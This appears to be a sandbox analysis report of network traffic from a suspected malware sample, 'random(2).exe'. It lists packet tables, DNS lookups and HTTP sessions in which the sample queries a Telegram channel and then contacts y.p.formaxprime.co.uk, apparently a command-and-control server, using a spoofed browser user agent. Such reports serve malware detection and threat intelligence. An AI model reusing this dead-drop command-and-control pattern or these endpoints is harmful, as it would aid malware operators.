                                                                                                                                          Mar 19, 2025 14:02:19.840086937 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840092897 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840225935 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840255976 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840418100 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840449095 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840678930 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840696096 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840712070 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840718985 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840907097 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840941906 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840956926 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840969086 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840976954 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840987921 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:21.089308023 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:21.089384079 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:21.089472055 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:21.147475004 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:21.147512913 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:24.927855015 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:24.927912951 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:24.927979946 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:24.928611994 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:24.928628922 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:25.172430992 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:25.172482014 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:25.172544003 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:25.173077106 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:25.173094988 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:25.273750067 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:25.273792028 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:25.273920059 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:25.274430037 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:25.274446964 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:25.338691950 CET49714443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:25.338751078 CET44349714142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:25.338813066 CET49714443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:25.339184999 CET49714443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:25.339200974 CET44349714142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:25.995058060 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.009469032 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.009536028 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.010660887 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.010915041 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.015968084 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.016071081 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.021092892 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.021114111 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.044024944 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.044583082 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.044609070 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.045680046 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.045912027 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.046542883 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.046614885 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.048371077 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.048377991 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.105459929 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.144220114 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.144527912 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.144546986 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.146327972 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.146627903 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.146790981 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.146976948 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.147022009 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.167952061 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.185930967 CET49714443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.192326069 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.214922905 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.214956999 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.223520041 CET44349714142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.223629951 CET44349714142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.223663092 CET49714443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.223750114 CET49714443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.298897982 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.298938036 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.301661015 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.301702976 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.302515030 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.304496050 CET49710443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.304516077 CET44349710142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.377449989 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.377491951 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.377521038 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.377545118 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.377547979 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.377566099 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.377587080 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.377592087 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.377614021 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.378061056 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.378113985 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.378120899 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.406423092 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.465610027 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.467097998 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.467114925 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.467195034 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.467195988 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.467207909 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.470412016 CET49713443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.470434904 CET44349713142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.471910954 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.471942902 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.472090006 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.472098112 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.472223043 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.475224018 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.481487036 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.481518984 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.481585979 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.481601000 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.482285976 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.488805056 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.494160891 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.494196892 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.494349003 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.494365931 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.494477034 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.501012087 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.507030964 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.507062912 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.507091999 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.507102966 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.507169008 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.513556957 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.561259031 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.561306953 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.561330080 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.561331987 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.561342001 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.561408997 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.561417103 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.562141895 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.566051960 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.566109896 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.566138983 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.566227913 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.566232920 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.566291094 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.566400051 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.571206093 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.571247101 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.571340084 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.571345091 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.571456909 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.577253103 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.584542990 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.584582090 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.584642887 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.584649086 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.584734917 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.590605974 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.596777916 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.596832037 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.596854925 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.596860886 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.596920967 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.603511095 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.608901024 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.609021902 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.609026909 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.609038115 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.609124899 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.615732908 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.620172977 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.620327950 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.620354891 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.620359898 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.620448112 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.625278950 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.630167007 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.630223036 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.630247116 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.630254984 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.630364895 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.634481907 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.639861107 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.639903069 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.639925957 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.639931917 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.639985085 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.644298077 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.655419111 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.655477047 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.655495882 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.655500889 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.655529022 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.655544043 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.655549049 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.655695915 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.658976078 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.659579992 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.659612894 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.659638882 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.659662962 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.659668922 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.659692049 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.663096905 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.663199902 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.663204908 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.665323019 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.665390015 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.665395021 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.667874098 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.667958021 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.667963028 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.670696020 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.670845985 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.670850039 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.673232079 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.673377037 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.673381090 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.676122904 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.676213026 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.676218033 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.679023027 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.679131031 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.679136038 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.682670116 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.683527946 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.683532000 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.684568882 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.685791969 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.685796022 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.690977097 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.693201065 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.693205118 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.697288990 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.697382927 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.697387934 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.697412014 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.697511911 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.697837114 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.697849035 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Mar 19, 2025 14:00:10.086121082 CET6349553192.168.2.101.1.1.1
                                                                                                                                          Mar 19, 2025 14:00:10.093422890 CET53634951.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:11.666421890 CET5582853192.168.2.101.1.1.1
                                                                                                                                          Mar 19, 2025 14:00:11.682214975 CET53558281.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:23.813159943 CET53499761.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:23.926227093 CET53589551.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:24.908086061 CET5796353192.168.2.101.1.1.1
                                                                                                                                          Mar 19, 2025 14:02:24.908375978 CET5349353192.168.2.101.1.1.1
                                                                                                                                          Mar 19, 2025 14:02:24.914949894 CET53579631.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:24.915292978 CET53534931.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.062863111 CET53574281.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.193135023 CET53507641.1.1.1192.168.2.10
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Mar 19, 2025 14:00:10.086121082 CET192.168.2.101.1.1.10xba31Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                          Mar 19, 2025 14:00:11.666421890 CET192.168.2.101.1.1.10xa76Standard query (0)y.p.formaxprime.co.ukA (IP address)IN (0x0001)false
                                                                                                                                          Mar 19, 2025 14:02:24.908086061 CET192.168.2.101.1.1.10x649eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                          Mar 19, 2025 14:02:24.908375978 CET192.168.2.101.1.1.10x882dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Mar 19, 2025 14:00:10.093422890 CET1.1.1.1192.168.2.100xba31No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                          Mar 19, 2025 14:00:11.682214975 CET1.1.1.1192.168.2.100xa76No error (0)y.p.formaxprime.co.uk78.47.63.132A (IP address)IN (0x0001)false
                                                                                                                                          Mar 19, 2025 14:02:24.914949894 CET1.1.1.1192.168.2.100x649eNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                          Mar 19, 2025 14:02:24.915292978 CET1.1.1.1192.168.2.100x882dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                          • t.me
                                                                                                                                          • y.p.formaxprime.co.uk
                                                                                                                                          • www.google.com
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.1049681149.154.167.994436980C:\Users\user\Desktop\random(2).exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:00:10 UTC90OUTGET /g_etcontent HTTP/1.1
                                                                                                                                          Host: t.me
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:00:11 UTC511INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Wed, 19 Mar 2025 13:00:10 GMT
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Content-Length: 12411
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: stel_ssid=a95a95c28573b44b36_4621748884215959652; expires=Thu, 20 Mar 2025 13:00:10 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Cache-control: no-store
                                                                                                                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                          Strict-Transport-Security: max-age=35768000
                                                                                                                                          2025-03-19 13:00:11 UTC12411INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 67 5f 65 74 63 6f 6e 74 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70
                                                                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @g_etcontent</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.p


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.104968278.47.63.1324436980C:\Users\user\Desktop\random(2).exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:00:12 UTC179OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:00:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:00:12 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          2025-03-19 13:00:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.104968378.47.63.1324436980C:\Users\user\Desktop\random(2).exe
